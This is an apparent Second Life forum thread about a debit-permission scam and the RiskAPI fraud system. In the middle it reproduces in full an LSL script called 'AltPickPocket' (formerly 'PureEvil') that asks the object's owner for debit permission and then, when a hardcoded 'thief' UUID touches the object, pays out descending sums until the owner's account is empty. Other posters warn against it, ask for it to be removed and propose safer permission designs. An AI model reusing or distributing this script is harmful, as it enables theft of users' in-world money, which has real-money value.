RiskAPI

hey jack, did you actually verify that the key you've posted is in fact the person who gave you the object? I show it as VH... and honestly, since key's are unique it's just another name... same rules apply...

also, and this isnt to call you a liar, but how do we know that this person actually gave this to you? how do we know that this person didn't make it for you, or give you a copy to use? how do we know that you didn't edit the script to implicate them?

I don't ask because I'm accusing you of lying, but to point out that anyone could do any of these things to grief a legitimate user, which is one of many reasons for the no names policy.

you're mad, I get that, I would be too. but the way to handle it is to get a linden to look at it, since they can determine if that user has the same script on them, that it hasn't been docotred, that they made it, and they can see how many other people have copies which might be affected....

we can't do that and the best you can do is warn your friends not to accept scripts or allow permissions for debit on items they can't verify themselves by looking, or having someone they trust do the same. I personally put pay scripts in the simplest form possible from all the other workings of a script that must be no-mod, leaving the pay portion moddable, so users can see what it does... and it starts out OFF so that when a user first loads an item, they know that the script they enable is the one doing the work. maybe I wouldn't need to if I were a houshold name like jevn etc, but I consider it a courtesy

How can I trace a key or UUIDDVWXMBXXXSSLWIS3435 (whatever it's called) to an avatar name?

Perhaps you are in RiskAPI because of the scam this person supposedly involved you in. I remember a blog post by Zero Linden a long time ago which first warned of receiving too many Linden dollars from strangers which could get your account flagged until they sort out where the funds came from or were going.

hey jack, did you actually verify that the key you've posted is in fact the person who gave you the object? I show it as VH... and honestly, since key's are unique it's just another name... same rules apply...

I feel for you and agree, that LL needs to do better management and testing, esspecially on somethign that impacts the users like RiskAPI.

That aside, could you remove the script from this post? It may be available other places, buy let's not make it easy for con-artists to find it to rip of even more people. Thanks.

~Jessy

//-----------------------------------------------------------------------------------
// AltPickPocket Script C 2005-2007
// Formerly Known as PureEvil
// By Mitzpatrick Fitzsimmons
//-----------------------------------------------------------------------------------

//----------------------------DISCLAIMER!--------------------------------------------
// This script will take money from the person that owns the object it is in
// ONLY IF that owner accepts the PERMISSION_DEBIT.

// The UUID of the "thief" variable is to whom the money is paid to.
// I accept no responsability for the USE or MISUSE of this script.
// As with anything in SL, make sure you know what you are doing before you do it.
//-----------------------------------------------------------------------------------

key thief = "605dc2e5-3bdf-427e-a38d-98390c124249"; // Insert the key of the person who is going to get the money here.
list ammount = [32768, 16384, 8192, 4096, 2048, 1024, 512, 256, 128, 64, 32, 16, 8, 4, 2, 1]; // Use a list to enumerate payments until the account is cleaned out.

// The pay function here will use the integers in the ammount list to transact payments to the thief UUID in incremental
// amounts until the list ends. In most cases this will deplete the account of the owner (unless there is more money in that
// owners account than is in the largest list amount).
pay () {
integer m = llGetListLength(ammount);
integer i = 0;
while (i<m) {
llGiveMoney(thief,llList2Integer(ammount,i));
i++;
}
}

default
{
on_rez(integer number)
{
llResetScript(); // Make sure Ownership Changes properly.
}

state_entry()
{
llSetObjectName("AltPickPocket"; // Set the Object Name
llRequestPermissions(llGetOwner(),PERMISSION_DEBIT);// Request Owners permission to debit money.
}

touch_start(integer total_number)
{
if(llDetectedKey(0) == thief) // if the thief is touching the object
{
llSay(0, "You are the Authorized."; // Tell them they are Authorized
pay(); // Then Pay them
}else{ // If it is not the thief touching the object
llSay(0, "You are NOT Authorized!"; // then deny them
}
}

run_time_permissions(integer number)
{
if(number >0)
{
llOwnerSay("Activated!";
llSetColor(<0,1,0>, ALL_SIDES);
llSetText("Active",<0,1,0>,1);
}else{
llSay(0, "PickPocket has no permissions";
llSetColor(<1,0,0>, ALL_SIDES);
llSetText("InActive",<1,0,0>,1);
}

}
}

Really? Bug report it! It's supposed to be a bright yellow/orange with a caution sign on it. I know, because I have to set up my scripted vendors and it's that color.

I think the change was a patch that was created by a user and incorporated by the Lindens in one of the releases a while back, but if you are using a different language client, it might not be yellow....

Why do they post a script like this in the lslwiki? It is interesting that a Quicktime exploit used to take over your avatar or steal your money is posted about in the blog, but this one doesn't get any recognition...

The script I clicked on in the beta grid took just a few seconds or so to take all my beta grid money, which is a good bit.

The dialog box, which I saw for the first time, is nice and big and noteworthy.

Because like me they believe that knowledge is power but if everyone has the knowledge than it's harder for the bad people to exploit it. I think they also don't take the paranoid approach to code and want to be as complete a resource as possible and incidentally there are legitimate usages for such a script such as transferring money easily from alts to mains.

A script can't be good or bad, the usage of it can be...

Indeed, on that note one should not hide the script because it can be used for bad by people who may be misguided.

I talked with LL months ago about removing the script from the script library forum. I couldn't understand why they wanted it to stay.

On the wiki I don't let people post crap like this (it was posted to the LSLWiki after I moved to the official wiki).

I'm a scripter, and for some products i don't want the script to become public.. the best idea should be to put money into objects, or grant a debit up to X l$... it would solve all problems.. "grant debit permission? specify max amount: [ 0] NO / YES"

So if I posted a script like this in my userspace you'd remove it?